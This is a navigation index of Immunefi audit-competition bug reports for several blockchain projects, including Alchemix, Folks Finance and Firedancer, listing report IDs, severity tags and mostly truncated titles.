Immunefi Audit Competitions
Active Boosts
  • README
  • Alchemix
    • 30555 - [SC - Low] Precision loss when calculating the FLUX amount...
    • 30556 - [SC - Low] Past defeated proposals may become executable i...
    • 30565 - [SC - Low] veALCX does not comply with ERC breaking compos...
    • 30584 - [SC - Insight] Invalid check to make sure Minter is already in...
    • 30592 - [SC - Medium] DOS attack by delegating tokens at MAX_DELEGATE...
    • 30598 - [SC - Low] Access Control Flaw in _burn Function Leads to ...
    • 30613 - [SC - Medium] malicious user can front run any call to the sw...
    • 30634 - [SC - Critical] Unauthorized minting of unlimited FLUX in tran...
    • 30650 - [SC - Critical] Infinite minting of FLUX through voterpoke
    • 30651 - [SC - Critical] Insolvency in RevenueHandlersol because unclaim...
    • 30655 - [SC - Critical] Binary search does not correctly handle duplica...
    • 30667 - [SC - Medium] Unlimited gauge numbers can DoS users distribut...
    • 30671 - [SC - Critical] Reward token permanent freeze due to bulk call ...
    • 30682 - [SC - Critical] Insufficient slippage control in RevenueHandler...
    • 30683 - [SC - Critical] User can increase their unclaimed Flux token wi...
    • 30685 - [SC - Medium] The proposer can be impeded from submitting a p...
    • 30694 - [SC - Low] Users approved for a single token id cannot wit...
    • 30699 - [SC - High] Permanent freezing of unclaimed ALCX yield when...
    • 30704 - [SC - Medium] Griefing an account from getting votes delegate...
    • 30708 - [SC - Low] treasuryPct can be exceeded than BPS due to inc...
    • 30710 - [SC - Insight] The execution of the proposal has no expiration
    • 30711 - [SC - Low] The result of the AggregatorVInterface is not v...
    • 30781 - [SC - Low] It is possible to lower the quorum requirements...
    • 30788 - [SC - Critical] User can increase their unclaimed Flux token wi...
    • 30800 - [SC - Critical] Stealing FLUX by claiming then merging position...
    • 30814 - [SC - Critical] Wrong calculation of boost amount in Voterpoke
    • 30818 - [SC - Low] division before multiplication in theamountToRa...
    • 30825 - [SC - Critical] Users can get unlimited amounts of Flux tokens
    • 30826 - [SC - High] ALCK rewards are lost when merging tokens becau...
    • 30860 - [SC - Critical] Wrong timestamp for totalVoting
    • 30886 - [SC - Medium] Wrong totalWeight in Votersol
    • 30898 - [SC - Critical] Call the deposit function before the distribute...
    • 30906 - [SC - Critical] Voterpoke can be called at will leading to a us...
    • 30910 - [SC - High] Processing of voting results is not implemented...
    • 30918 - [SC - Insight] Incorrect implementation of ownerOf makes veALC...
    • 30919 - [SC - Critical] Front running of pokeTokens could lead to loss ...
    • 30920 - [SC - Low] User loses access to claims after merging of to...
    • 30921 - [SC - Low] Referential assignment causes incorrect block i...
    • 30922 - [SC - High] DOS of withdrawals through filling the userPoin...
    • 30925 - [SC - Critical] Manipulation of governance voting result by unl...
    • 30926 - [SC - Low] AlchemixGovernor updates to quorum can affect p...
    • 30939 - [SC - Critical] Misuse of curve pool calls results for precisio...
    • 30951 - [SC - Low] Incorrect ownerOf implementation makes veALCX n...
    • 30959 - [SC - Insight] Immutable gauges can break the state of the vot...
    • 30972 - [SC - Critical] Theft of unclaimed yield of the revenue in the ...
    • 30973 - [SC - Low] Incorrect Validation of treasuryPct in the Reve...
    • 30985 - [SC - Medium] Griefing attack prevents admins from disabling ...
    • 30990 - [SC - Critical] Users can use Voterpoke to accrue Flux tokens i...
    • 30992 - [SC - Insight] Inconsistent State Missing Event Emission in Fl...
    • 30999 - [SC - Critical] An edge-case mints times more FLUX than it should
    • 31008 - [SC - High] Alcx rewards are permanently frozen when two to...
    • 31042 - [SC - High] Claiming alchemic-token rewards can fail for so...
    • 31071 - [SC - Critical] User can steal bribes and prevent other users f...
    • 31076 - [SC - Critical] checkpointTotalSupply can checkpoint before a t...
    • 31077 - [SC - Critical] RevenueHandler counts unclaimed tokens as new r...
    • 31078 - [SC - High] withdraw doesnt claim all rewards before burnin...
    • 31079 - [SC - Critical] Claiming bribes for epochs you didnt vote for l...
    • 31080 - [SC - Insight] DoS in startCooldown when users want start cool...
    • 31082 - [SC - Critical] Expired locks can be used to claim rewards
    • 31085 - [SC - Critical] Malicious users can front-run the distribution ...
    • 31087 - [SC - Low] Colition between approve and _isApprovedOrOwner...
    • 31112 - [SC - Critical] Bribesolwithdraw doesnt update the totalVotings...
    • 31141 - [SC - Critical] Permanent freezing of unclaimed yield of reward...
    • 31149 - [SC - Critical] Manipulation of governance voting result by unl...
    • 31151 - [SC - Medium] Delegation Saturation Leading to Asset Freezing...
    • 31163 - [SC - Critical] Malicious actor can acquire bribe rewards by bl...
    • 31184 - [SC - Critical] Deflating the total amount of votes in a checkp...
    • 31189 - [SC - High] Voting algorithm does not apply maximum availab...
    • 31196 - [SC - Critical] Voterpoke does not check lastVoted resulting in...
    • 31198 - [SC - Critical] VotingEscrowmerge does not check whether the _f...
    • 31199 - [SC - Critical] Users might receive less rewars token after Vot...
    • 31211 - [SC - Critical] Inflation Of Total Votes and Potential Freeze o...
    • 31222 - [SC - Critical] Unlimited Flux minting
    • 31223 - [SC - Critical] Disproportionate Rewards Manipulation in Bribesol
    • 31226 - [SC - Insight] Missing Revert Message in require statement lea...
    • 31234 - [SC - Medium] Alchemix BlockSlope variable in checkpoint rou...
    • 31242 - [SC - Critical] RevenueHandlercheckpoint allows users to claim ...
    • 31249 - [SC - Critical] malicious user can back-run Voterdistribute to ...
    • 31253 - [SC - Critical] RevenueHandlercheckpoint isnt correctly
    • 31258 - [SC - High] Loss of Unclaimed Bribes After Burning veALCX T...
    • 31263 - [SC - Critical] RevenueHandlercheckpoint counts unclaimed rewar...
    • 31264 - [SC - Insight] Multiple Reports QALowOOS Medium
    • 31272 - [SC - Low] Approved user cant merge tokens not approved fo...
    • 31276 - [SC - High] BPT can be locked for only week resulting in u...
    • 31277 - [SC - Insight] The user can propose with less voting power tha...
    • 31280 - [SC - Critical] Malicious user can mint unlimited flux tokens
    • 31281 - [SC - Low] Approved spender cannot withdraw or merge
    • 31284 - [SC - Insight] cancel should allow to cancel the proposal of t...
    • 31293 - [SC - High] Voters who withdraw veLACX tokens risk losing g...
    • 31295 - [SC - High] Newly created gauge may missed out on its rewards
    • 31298 - [SC - Medium] Anyone can let users delegates reach the upper ...
    • 31309 - [SC - Critical] slippage protection is inaccurate
    • 31326 - [SC - High] Precision loss causes minor loss of FLUX when c...
    • 31329 - [SC - Critical] Attacker can gain infinitive FLUX by repeating ...
    • 31335 - [SC - High] getActualSupply should be used instead of total...
    • 31355 - [SC - Low] Past Defeated Proposals Can Be Executed in the ...
    • 31375 - [SC - Critical] Lack of Access control in poke function allows ...
    • 31377 - [SC - Critical] Stucked yield tokens upon withdrawal of votes f...
    • 31380 - [SC - High] FluxTokencalculateBPT uses wrong algorithm caus...
    • 31381 - [SC - Low] Alchemix Incorrect Initialisation of struct in...
    • 31382 - [SC - High] VotingEscrowupdateUnlockTime - Its possible for...
    • 31383 - [SC - Low] price feeds sanity checks isnt correct in funct...
    • 31385 - [SC - Low] RewardsDistributortokensPerWeek might be zero i...
    • 31386 - [SC - Critical] Malicious user can steal FLUX token by abusing ...
    • 31388 - [SC - Critical] Vulnerability in the poke function of Voting co...
    • 31390 - [SC - High] Precision Loss in FluxTokensolgetClaimableFlux
    • 31397 - [SC - Critical] In Bribesol _writeVotingCheckpoint isnt called ...
    • 31399 - [SC - High] RewardDistributor claims can be DoSed through e...
    • 31407 - [SC - Insight] Alchemist is given over Allowance through Reven...
    • 31408 - [SC - Critical] Killed Gauge continue to accrue and steal rewar...
    • 31409 - [SC - Critical] Users can grief Bribe rewards forcing them to b...
    • 31410 - [SC - Medium] Griefing Attack using delegate will expose User...
    • 31413 - [SC - Medium] DOS attack by delegating tokens at MAX_DELEGATES
    • 31416 - [SC - Insight] Impossible to set boostMultiplier to MIN_BOOST
    • 31417 - [SC - Insight] Compound claiming transactions will revert if u...
    • 31418 - [SC - Critical] the killed gauge collect claim amount
    • 31420 - [SC - Insight] No array lengths check in VotersolclaimBribes
    • 31425 - [SC - Medium] Users can call reset on their token even if the...
    • 31430 - [SC - Insight] QA
    • 31435 - [SC - High] ALCX rewards arent claimed for from token when ...
    • 31443 - [SC - Insight] Incorrect values of votingDelay and votingPerio...
    • 31444 - [SC - Critical] Manipulation of ve voting mechanism unlimited b...
    • 31447 - [SC - High] veALCX holders are able to withdraw rewards and...
    • 31448 - [SC - Medium] Bypassing the Governances proposal threshold to...
    • 31449 - [SC - Low] BribegetRewardForOwner should not revert if the...
    • 31451 - [SC - Insight] MAX_PROPOSAL_NUMERATOR is incorrectly set
    • 31453 - [SC - Critical] The balance of RevenueHandler can be drained
    • 31458 - [SC - Critical] Invalid handling of epochs revenue for tokens t...
    • 31460 - [SC - Insight] supportsInterface does not return typeIERCRecei...
    • 31461 - [SC - Critical] veALCX holder can mint Unlimited FLUX tokens
    • 31462 - [SC - Medium] Alchemix addReward access control can be bypas...
    • 31466 - [SC - Critical] Wrong reward calculation leads to rewards being...
    • 31470 - [SC - Critical] Bribing protocols pay bribes but dont get emiss...
    • 31472 - [SC - Critical] Stealing all revenue from the Alchemix protocol
    • 31478 - [SC - High] calculateBPT doesnt divide by basis points infl...
    • 31479 - [SC - High] alchemechNFT holder will get too little FLUX be...
    • 31480 - [SC - High] Miscalculation of global bias
    • 31481 - [SC - Critical] Undound FLUX accrual through reset and merge
    • 31483 - [SC - Critical] Users can vote multiple times in one epoch
    • 31484 - [SC - High] Rewards for the first epoch at rewards distribu...
    • 31485 - [SC - Critical] Miscalculation of distributed tokens at revenue...
    • 31486 - [SC - High] getClaimableFlux miscalculates claimable FLUX f...
    • 31487 - [SC - Low] Wrong condition check on RevenueHandlerconstruc...
    • 31488 - [SC - Critical] Merging tokens allows multiple Flux accruals wi...
    • 31494 - [SC - High] Alchemix The first epochs ALCX emissions of vo...
    • 31495 - [SC - Critical] Users cannot claim rewards from RevenueHandler ...
    • 31497 - [SC - Low] executeBatch lacks payable so ethers can not be...
    • 31498 - [SC - High] Alchemix ALCX rewards are currently subject to...
    • 31503 - [SC - Insight] Incorrect value of MAX_PROPOSAL_NUMERATOR in Al...
    • 31507 - [SC - Critical] Malicious user could flash-loan the veALCX to i...
    • 31512 - [SC - Critical] Infinite minting of FLUX through Merge
    • 31514 - [SC - Medium] Malicious users can cause pokeTokens to revert
    • 31519 - [SC - Low] Lack of revert statement in Votersolpoke result...
    • 31520 - [SC - Critical] Incorrect accounting of totalVoting leads to pe...
    • 31521 - [SC - Medium] Early return in RewardsDistributorclaim can cau...
    • 31523 - [SC - Low] USDT Approval will cause function failure
    • 31524 - [SC - High] Rounding down in getClaimableFlux leads to less...
    • 31526 - [SC - Critical] A user is able to claim more bribes than they h...
    • 31527 - [SC - Critical] No accounting for totalVoting in Bribesolwithdr...
    • 31539 - [SC - Medium] The Voterdistribute function can continue to fail
    • 31540 - [SC - Insight] Expired Token Locks Impacting Vote Weight Calcu...
    • 31541 - [SC - Critical] FluxTokens unlimited mint and Exploitation of g...
    • 31542 - [SC - Low] Bribeearned - L Its potentially possible to ear...
    • 31544 - [SC - High] Certain small amount of tokens are not accounte...
    • 31552 - [SC - Insight] Lack of the validation for a Flash token protec...
    • 31555 - [SC - Low] RewardsDistributoramountToCompound - L The stal...
    • 31556 - [SC - Critical] Unfair Revenue Distribution in Non-Alchemix Rev...
    • 31558 - [SC - Insight] Discrepancy in MAX_PROPOSAL_NUMERATOR Value in ...
    • 31559 - [SC - Low] Minter UpdatePeriod after weeks causes Rewards...
    • 31562 - [SC - Medium] Every consecutive epoch will have same number o...
    • 31563 - [SC - Low] Oracle days staleThreshold for priceTimestamp ...
    • 31566 - [SC - Medium] Checkpoints wont update block number in point b...
    • 31567 - [SC - Critical] VotingEscrowsolcheckpoint is completely broken
    • 31575 - [SC - Medium] depositIntoRewardPool and withdrawFromRewardPo...
    • 31579 - [SC - Critical] Infinite mint of FLUX using poke
    • 31583 - [SC - Insight] Off by one error while adding reward pool token
    • 31584 - [SC - Critical] Loss Of Boosted Weight When Poking In The Same ...
    • 31588 - [SC - Low] Users could start cooldown period for their wit...
    • 31592 - [SC - Insight] Collection of other important issues
    • 31594 - [SC - Insight] RewardPoolManager can only add RewardPoolToken ...
    • 31597 - [SC - High] Loss of precision while calculating claimable f...
  • BadgerDAO (eBTC)
    • 28546 - [SC - Insight] FlashLoan can be taken with no fee to be paid
    • 28605 - [SC - Insight] Reentrancy on ActivePool allows users to borrow...
    • 28659 - [SC - Insight] Reentrancy in BorrowerOperationsflashLoan enabl...
    • 28713 - [SC - Insight] Reentrancy on BorrowerOperations allows users t...
    • 28791 - [SC - Low] The system protects from any rounding issues wh...
    • 28823 - [SC - Insight] Lido slashing can negatively affect the whole l...
    • 28828 - [SC - Low] Use of deprecated Chainlink API can lead contra...
    • 28843 - [SC - Low] Canceled partial redeeming syncs the accounting...
    • 28849 - [SC - Low] Using batchRedemption even if the TCR becomes s...
    • 28853 - [SC - Insight] Trycatch will not function with internal type
    • 28858 - [SC - Insight] Execution of SortedCpds while command may cause...
    • 28862 - [SC - Insight] Static MIN_CHANGE threshold and lack of relativ...
    • 28864 - [SC - Insight] Unfair Liquidation when ICR equals TCR in redee...
    • 28890 - [SC - Insight] EBTCTokensol mint function lack of checks allow...
    • 28916 - [SC - Insight] Liquidation Abuse More than half of all assets ...
    • 28967 - [SC - Insight] When fallback oracle is frozen fetchPrice can r...
    • 28973 - [SC - Insight] Users CDPs can be removed unintentionally by CD...
    • 28980 - [SC - Insight] Ther is an invariant Check Failure in flashLoan...
    • 29000 - [SC - Insight] Potential for Denial-of-Service in the redeemCo...
    • 29002 - [SC - Insight] Incorrect implementation of EIP- domain separat...
  • DeGate
    • 25882 - [SC - Insight] Freezing of funds from the Default Deposit Cont...
    • 25885 - [SC - Insight] Prevent the operator from submitting blocks to L
    • 25886 - [SC - Insight] registerToken can be front-run causing token ca...
    • 25892 - [SC - Insight] A malicious user can DoS force withdraw request...
    • 25903 - [SC - Insight] Possible loss of user funds by front-runing the...
    • 25906 - [SC - Insight] setDelay function doesnt revert even when the d...
    • 25917 - [SC - Insight] Timelock can call transferProxyOwnership of Dep...
    • 25921 - [SC - Insight] Flaw in upgradeToAndCall leads to the proxy cal...
    • 25927 - [SC - Insight] MultiSig Owners can set malicious implementatio...
    • 25930 - [SC - Insight] Malicious owner can update the DepositParams st...
    • 25933 - [SC - Insight] The last person to confirm can control the exec...
    • 25935 - [SC - Insight] Permissive Fallback Function
    • 25952 - [SC - Insight] The smart contract could be inoperable due to w...
    • 26012 - [SC - Insight] getTransactionIds will break at some point runn...
    • 26017 - [SC - Insight] getTransactionCount will break at some point ru...
    • 26039 - [SC - Insight] Proxy contract deployments can be front-run to ...
    • 26066 - [SC - Insight] Timelock eta variable can be set further than i...
    • 26073 - [SC - Insight] The implementation upgrade must be done by call...
    • 26095 - [SC - Insight] ID Uniqueness Violations
    • 26104 - [SC - Insight] Governance mechanism could be exploited to free...
    • 26110 - [SC - Insight] All the funds from the DepositProxy contracts c...
    • 26116 - [SC - Insight] The MultiSigWalletgetTransactionIds function co...
    • 26124 - [SC - Insight] Some owners of the MultiSigWallet can bring the...
    • 26189 - [SC - Insight] Malicious Exchange Owner can sandwich-attack Et...
    • 26204 - [SC - Insight] DeGate Operator has capability to disable balan...
    • 26236 - [SC - Insight] Malicious DeGate Operator EOA can irreversibly ...
    • 26259 - [SC - Insight] txHash collision is possible
    • 26275 - [SC - Insight] Bad implementation of executeTransaction functi...
    • 26286 - [SC - Insight] Potential Signature Validation Bypass
    • 26422 - [SC - Insight] there is no explicit gas limit in external call...
    • 26423 - [SC - Insight] Timelock executeTransaction function will succe...
    • 26431 - [SC - Insight] High Risk in transfer of proxyOwnership
    • 26446 - [SC - Insight] Consider implementing a two step process in tra...
    • 26468 - [SC - Insight] Fee-on-transfer tokens can be used to steal oth...
    • 26479 - [SC - Insight] ExchangeV cannot be reinitialized after an upgrade
    • 26501 - [SC - Insight] Timelock should handle queuing transactions and...
    • 26502 - [SC - Insight] DeGate Exodus mode forcing study
    • 26509 - [SC - Insight] Exodus Mode Force
    • 26516 - [SC - Insight] Gnosis Multisig Contract can become unusable
    • 26519 - [SC - Insight] Consider introducing the ability to change requ...
    • 26520 - [SC - Insight] Multisig Contract onChain can be bricked
    • 26521 - [SC - Insight] ChainId is missing
    • 26527 - [SC - Insight] Possible emission of wrong data in cancelTransa...
    • 26529 - [SC - Insight] Mitigate Griefing Attacks Theft of Gas by Impl...
    • 26530 - [SC - Insight] Inefficiency in upgradeToAndCall
  • Firedancer v0.1
    • Boost _ Firedancer v0.1 33347 - [Blockchain_DLT - Medium] Integer underflow leading to memory corrup
    • Boost _ Firedancer v0.1 33348 - [Blockchain_DLT - Medium] Integer underflow leading to memory corrup
    • Boost _ Firedancer v0.1 33378 - [Blockchain_DLT - Medium] OOB Write leading to memory corruption in
    • Boost _ Firedancer v0.1 33586 - [Blockchain_DLT - Insight] fd_ebpf_static_link - possible disclosure
    • Boost _ Firedancer v0.1 33669 - [Blockchain_DLT - Medium] fd_quic_process_packet out of bounds read
    • Boost _ Firedancer v0.1 33717 - [Blockchain_DLT - Medium] Memory corruption caused by fully controll
    • Boost _ Firedancer v0.1 33718 - [Blockchain_DLT - Medium] The malicious fd_shred_t data passed betwe
    • Boost _ Firedancer v0.1 33774 - [Blockchain_DLT - Medium] The malicious fd_txn_p_t data passed betwe
    • Boost _ Firedancer v0.1 33862 - [Blockchain_DLT - Insight] Discord Server Vulnerable to Takeover in
    • Boost _ Firedancer v0.1 33936 - [Blockchain_DLT - Medium] shred tile fails to process zero sized udp
    • Boost _ Firedancer v0.1 34064 - [Blockchain_DLT - Medium] bank tile possible code execution
    • Boost _ Firedancer v0.1 34234 - [Blockchain_DLT - Insight] Setting the variable shred_cnt in the shr
    • Boost _ Firedancer v0.1 34272 - [Blockchain_DLT - Medium] Remote memory corruption in Shred tile
    • Boost _ Firedancer v0.1 34290 - [Blockchain_DLT - Medium] bank tile overflow
    • Boost _ Firedancer v0.1 34501 - [Blockchain_DLT - Medium] DoS in shreds validation
    • Boost _ Firedancer v0.1 34564 - [Blockchain_DLT - Medium] shred tile overflow
    • Boost _ Firedancer v0.1 34682 - [Blockchain_DLT - Medium] DoS in shreds validation
  • Folks Finance
    • Boost _ Folks Finance 33258 - [Smart Contract - Insight] Usage of floating pragma
    • Boost _ Folks Finance 33269 - [Smart Contract - Critical] Logic flaw in UserLoanincreaseCollateral leads to double-counting of effectiveCollateral of userLoan
    • Boost _ Folks Finance 33272 - [Smart Contract - Medium] FrontRunning Attack on createAccount
    • Boost _ Folks Finance 33280 - [Smart Contract - Low] NodeManagersupportsInterface doesnt follow EIP-
    • Boost _ Folks Finance 33311 - [Smart Contract - Critical] Infinite Interest rate bug
    • Boost _ Folks Finance 33353 - [Smart Contract - Low] Incorrect implementation of Time-Weighted Average Price for a Chainlink feed will lead to Incorrect Liquidation amount and breaks multiple price consumption based function
    • Boost _ Folks Finance 33356 - [Smart Contract - Low] All data in _userLoans mapping will not be deleted after calling deleteUserLoan
    • Boost _ Folks Finance 33376 - [Smart Contract - Insight] BridgeRouterreceiveMessage Allows Message Replay Across Different Adapters
    • Boost _ Folks Finance 33441 - [Smart Contract - Insight] Protocol uses Pyth to fetch price which is a pull based oracle and requires price updates to be pushed by the user which is not taken care off
    • Boost _ Folks Finance 33443 - [Smart Contract - Low] StalenessCircuitBreakerNode checks if the last update time of the parent node is less than the threshold but the publicTime could be greater than current blocktimestamp
    • Boost _ Folks Finance 33454 - [Smart Contract - Low] unsafe casting will lead to break of PythNode Oracle
    • Boost _ Folks Finance 33526 - [Smart Contract - Insight] Need to check returnAdapterId
    • Boost _ Folks Finance 33533 - [Smart Contract - Critical] depositDatainterestRate is not correct
    • Boost _ Folks Finance 33534 - [Smart Contract - Medium] denial of service vulnerability and possible griefing in cross-chain account creation
    • Boost _ Folks Finance 33540 - [Smart Contract - Low] ChainlinkNode uses cached decimals in the calculation instead of fresh one
    • Boost _ Folks Finance 33542 - [Smart Contract - Medium] Attacker can create loan before users tx is completed through bridge
    • Boost _ Folks Finance 33546 - [Smart Contract - Medium] Adversaries can manipulate victims stable rate to remain excessively high via flashloan
    • Boost _ Folks Finance 33566 - [Smart Contract - Low] RepayWithCollateral will almost always fail in partial repayment
    • Boost _ Folks Finance 33568 - [Smart Contract - Medium] Front-running vulnerability in cross-chain loan creation process could lead in funds loss for users
    • Boost _ Folks Finance 33588 - [Smart Contract - Insight] The liquidator can make the protocol incur bad debt by partially liquidating the position
    • Boost _ Folks Finance 33589 - [Smart Contract - Medium] Anyone can call the BridgeRouter Recieve function with malicious data to transfer funds
    • Boost _ Folks Finance 33596 - [Smart Contract - Low] Incorrect rounding direction in HubPoolLogicupdateWithRepayWithCollateral can lead to accounting error of total token amount in HubPool
    • Boost _ Folks Finance 33609 - [Smart Contract - Medium] Account creation can be frontrun making the users unable to create an account
    • Boost _ Folks Finance 33611 - [Smart Contract - Medium] Adversary can perform a DoS on users createLoan and createLoanAndDeposit operation sent from Spoke chain
    • Boost _ Folks Finance 33614 - [Smart Contract - Medium] Front-Running Vulnerability in createAccount Method
    • Boost _ Folks Finance 33630 - [Smart Contract - High] Incorrect calculation of loanBorrowbalance
    • Boost _ Folks Finance 33631 - [Smart Contract - Low] Wrong implementation of chainLink getTwapPrice Can lead to wrong price or latest price being used
    • Boost _ Folks Finance 33643 - [Smart Contract - Low] PriceFeed from PythNode will always revert for some pools
    • Boost _ Folks Finance 33644 - [Smart Contract - Insight] Insufficient msgvalue validation for Wormhole adapters will lead to Wormhole cross-chain messages being reverted
    • Boost _ Folks Finance 33645 - [Smart Contract - Medium] Griefing an user from creating an account
    • Boost _ Folks Finance 33652 - [Smart Contract - Insight] BridgeRouters Unprotected Reversal Function Compromises User Control
    • Boost _ Folks Finance 33665 - [Smart Contract - Critical] Collateral Inflation Exploit via Zero-Amount Deposits Allows An Attacker to Drain Any Pool
    • Boost _ Folks Finance 33670 - [Smart Contract - Insight] Violator can deny his liquidation by front running it and changing the loan borrow type
    • Boost _ Folks Finance 33675 - [Smart Contract - Low] PythNodeprocess can revert because of incorrect casting
    • Boost _ Folks Finance 33684 - [Smart Contract - Critical] Lack of available liquidity check when sending token back from Hub leads to first deposit and inflation attack
    • Boost _ Folks Finance 33687 - [Smart Contract - Medium] Loan creation can be frontrun preventing the users from creating loans
    • Boost _ Folks Finance 33694 - [Smart Contract - Medium] stableBorrowRates are manipulatable through flashloan attacks
    • Boost _ Folks Finance 33695 - [Smart Contract - Critical] Attacker can borrow more than the collateral deposit
    • Boost _ Folks Finance 33713 - [Smart Contract - Insight] Some transactions can revert when nodetype is PriceDeviationSameOracleCircuitBreakerNode
    • Boost _ Folks Finance 33746 - [Smart Contract - Insight] Rounding down to zero leads to liquidate function will be halted with Panic error
    • Boost _ Folks Finance 33778 - [Smart Contract - Medium] The loan creation process can be griefed
    • Boost _ Folks Finance 33779 - [Smart Contract - Medium] The account creation process can be griefed
    • Boost _ Folks Finance 33780 - [Smart Contract - Critical] Zero deposits can be used to artificially inflate a users collateral value allowing them to borrow excess funds
    • Boost _ Folks Finance 33787 - [Smart Contract - Low] Function PythNodeprocess doesnt handle correctly PRECISION pythDataexpo
    • Boost _ Folks Finance 33807 - [Smart Contract - Low] updateInterestRate uses incorrect reference of borrow interest rate to calculate deposit interest can lead to the loss of lenders unclaimed yield
    • Boost _ Folks Finance 33816 - [Smart Contract - Critical] Attacker can get unlimited loan for some minimum deposit due to the incorrect calculation of user health in getLoanLiquidity
    • Boost _ Folks Finance 33817 - [Smart Contract - High] Incorrect calculation of effective borrow value in getLoanLiquidity leads to protocol insolvency through wrong withdrawals and liquidations
    • Boost _ Folks Finance 33852 - [Smart Contract - Insight] Small positions will not get liquidated
    • Boost _ Folks Finance 33869 - [Smart Contract - Medium] loanIds are easy to reproduce and front-running enable malicious parties to lock user funds
    • Boost _ Folks Finance 33870 - [Smart Contract - Low] convToRepayBorrowAmount calculation is incorrect causing liquidators to repay extra instead of receiving a bonus
    • Boost _ Folks Finance 33880 - [Smart Contract - Medium] Front-Running Vulnerability in createUserLoan Method
    • Boost _ Folks Finance 33885 - [Smart Contract - Low] Incorrect prices will be returned if the NodeType is PRICE_DEVIATION_CIRCUIT_BREAKER
    • Boost _ Folks Finance 33893 - [Smart Contract - Medium] Malicious users can DoS loan creations and deposits causing temporary funds freezing and additional costs incurred for message reversals
    • Boost _ Folks Finance 33923 - [Smart Contract - Low] Function HubPoolLogicupdateWithWithdraw doesnt round up in favour of protocol if isFAmount false
    • Boost _ Folks Finance 33935 - [Smart Contract - Insight] Liquidations dont ensure the violator loan becomes healthy afterwards
    • Boost _ Folks Finance 33947 - [Smart Contract - Low] During liquidations when borrowToRepay collateral the liquidator pays more borrowAmount than they should and receives no bonus
    • Boost _ Folks Finance 33950 - [Smart Contract - Low] pythnode oracle unexpected revert
    • Boost _ Folks Finance 33953 - [Smart Contract - Low] Calling process function will not revert even if two oracle nodes of the same type are used
    • Boost _ Folks Finance 33970 - [Smart Contract - Medium] User deposits can be blocked
    • Boost _ Folks Finance 33978 - [Smart Contract - Critical] Attacker can Inflate effectiveCollateralValue
    • Boost _ Folks Finance 33981 - [Smart Contract - Low] The PythNode library process function implementation does not account for pythDataexpo being greater than PRECISION
    • Boost _ Folks Finance 33987 - [Smart Contract - Medium] Incorrect access control in receiveMessage leads to total loss of funds
    • Boost _ Folks Finance 34025 - [Smart Contract - Medium] Malicious user can DoS the creation of every account at no cost by front running it with the same accountId
    • Boost _ Folks Finance 34028 - [Smart Contract - Medium] Denial of Service DoS vulnerability in UserLoan creation due to front-running attack
    • Boost _ Folks Finance 34029 - [Smart Contract - Medium] Contract fails to mitigate potential critical state where anyone can call BridgeRouterHubreceiveMessage directly
    • Boost _ Folks Finance 34030 - [Smart Contract - Low] Incorrect rounding down in HubPoolLogicupdateWithWithdraw when users withdraw using underlying amount
    • Boost _ Folks Finance 34047 - [Smart Contract - Low] Adversaries can create a position that is nearly impossible to liquidate due to high gas consumption
    • Boost _ Folks Finance 34050 - [Smart Contract - High] Vulnerability in getLoanLiquidity leads to undervaluing stable debt
    • Boost _ Folks Finance 34052 - [Smart Contract - Low] withdraw doesnt round in favour of protocol for isFamountFalse
    • Boost _ Folks Finance 34054 - [Smart Contract - Low] In liquidation loanPoolcollateralUsed doesnt get reduced by collateralSeizedreserveAmount
    • Boost _ Folks Finance 34066 - [Smart Contract - Medium] Account Creation Front-Running Vulnerability Leading to Gas Fee Theft
    • Boost _ Folks Finance 34069 - [Smart Contract - Low] repayWithCollateral may revert when repay samll amount token
    • Boost _ Folks Finance 34074 - [Smart Contract - Critical] Hub missing check for available liquidity could lead to locked fund and utilization ratio exceeding
    • Boost _ Folks Finance 34076 - [Smart Contract - Low] Wrong way of deriving message keys using destination chains CCTP domain id
    • Boost _ Folks Finance 34085 - [Smart Contract - Low] partial repayment with collaterals will revert due to underflow
    • Boost _ Folks Finance 34122 - [Smart Contract - High] Wrong borrow balance calculation in the getLoanLiquidity function
    • Boost _ Folks Finance 34124 - [Smart Contract - Low] Smart contract cannot be accessed during the normal liquidation process that involves fully acquiring the borrowers balance
    • Boost _ Folks Finance 34127 - [Smart Contract - Low] Liquidator gets more debt than usual
    • Boost _ Folks Finance 34132 - [Smart Contract - Low] Liquidation bonus incorrectly inflates repayBorrowAmount instead of seizeUnderlyingCollateralAmount leading to wrong liquidations
    • Boost _ Folks Finance 34148 - [Smart Contract - Low] Full liquidations will fail for certain unhealthy positions
    • Boost _ Folks Finance 34150 - [Smart Contract - Low] Failed messages never expire and can be replayed by anyone potentially allowing users to be griefed
    • Boost _ Folks Finance 34153 - [Smart Contract - Low] TWAP query by chainlink is wrong according to chainlink docs
    • Boost _ Folks Finance 34158 - [Smart Contract - Low] NodeManagersupportsInterface returns false for typeIERCinterfaceId
    • Boost _ Folks Finance 34161 - [Smart Contract - Medium] Denial of Service via Front-Running in Loan Creation Mechanism
    • Boost _ Folks Finance 34169 - [Smart Contract - Low] Potential revert in PythNode library due to incorrect use of SafeCast toUint
    • Boost _ Folks Finance 34174 - [Smart Contract - Low] Bug in liquidation logic leads to stealing funds from liquidatorsunprofitable liquidations
    • Boost _ Folks Finance 34179 - [Smart Contract - High] Incorrect Updates to pooldepositDatatotalAmount and loancollateralUsed During Repayment with Collateral
    • Boost _ Folks Finance 34183 - [Smart Contract - Insight] rebalanceUp could be used to lower the userLoanstableInterestRates in certain conditions
    • Boost _ Folks Finance 34188 - [Smart Contract - Insight] BridgeRouterHub can add address adapter
    • Boost _ Folks Finance 34190 - [Smart Contract - Critical] Liquidated users can mix and manipulate stable and variable borrowings through exploitative liquidation process
  • Fuel Network | Attackathon
    • Attackathon _ Fuel Network 32269 - [Smart Contract - High] Incorrect fuel dce optimization register
    • Attackathon _ Fuel Network 32270 - [Smart Contract - Low] Inappropriate fuel dce on side affects
    • Attackathon _ Fuel Network 32271 - [Blockchain_DLT - Medium] Incorrect state range access helper
    • Attackathon _ Fuel Network 32275 - [Smart Contract - Medium] Various Sway Libs Bugs
    • Attackathon _ Fuel Network 32276 - [Smart Contract - Insight] wrong implementation in gt and lt func
    • Attackathon _ Fuel Network 32291 - [Blockchain_DLT - Insight] Profiling is incorrect for dependent g
    • Attackathon _ Fuel Network 32302 - [Smart Contract - Low] Src ContractConfigurables hash collision
    • Attackathon _ Fuel Network 32314 - [Smart Contract - Insight] Missing _disableInitializers in FuelER
    • Attackathon _ Fuel Network 32327 - [Websites and Applications - Low] REVISED Malicious Downtime via
    • Attackathon _ Fuel Network 32378 - [Smart Contract - Insight] Missing Zero-Check for Recipient Addre
    • Attackathon _ Fuel Network 32388 - [Smart Contract - Low] Buffer overflow in EncodeBufferAppend intr
    • Attackathon _ Fuel Network 32390 - [Smart Contract - Low] Unchecked Virtual Immediate Construction O
